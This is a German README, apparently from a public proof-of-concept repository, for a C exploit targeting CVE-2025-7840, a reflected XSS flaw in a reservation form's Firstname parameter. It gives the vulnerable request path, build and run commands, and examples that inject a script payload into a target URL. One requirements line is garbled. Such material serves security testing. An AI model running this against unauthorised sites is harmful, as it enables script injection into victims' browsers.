
Proof‑of‑concept‑Exploit für CVE‑2025‑7840, der bösartige Payloads in den Firstname‑Parameter eines Reservierungsformulars injiziert, um XSS auszulösen
Autor: Byte Reaper (@ByteReaper0)
Proof‑of‑Concept‑Exploit für CVE-2025-7840, der einen anfälligen Webanwendungsendpunkt angreift, der die Benutzereingabe im Parameter Firstname eines Reservierungsformulars nicht bereinigt. Durch das Erstellen einer GET-Anfrage an:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
kann ein Angreifer beliebiges JavaScript in den Browser des Opfers injizieren und ausführen, wenn die Antwort gerendert wird.
-b-c-v)libcurl-Entwicklungsheaderargparse-Bibliothek für CKompilieren des Exploits:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <ZIEL_URL> [Optionen]
| Flag | Beschreibung |
|---|---|
-u URL | Ziel-Basis-URL (z. B. http://victim.local) |
-b PAYLOAD | Benutzerdefinierte XSS-Payload zum Injizieren |
-c DATEI | Cookie-Jar-Datei für die Sitzungsverwaltung |
-v | Ausführlicher Modus (zeigt Anfrage-/Antwortdetails) |
Standard-Payloads gegen ein Ziel ausführen:
sudo ./exploit -u http://victim.local
Eine benutzerdefinierte Payload verwenden:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
Sitzungs-Cookies einbeziehen und ausführliche Ausgabe:
sudo ./exploit -u http://victim.local -c cookies.txt -v
Dieser Code dient nur zu Bildungs- und Testzwecken. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
MIT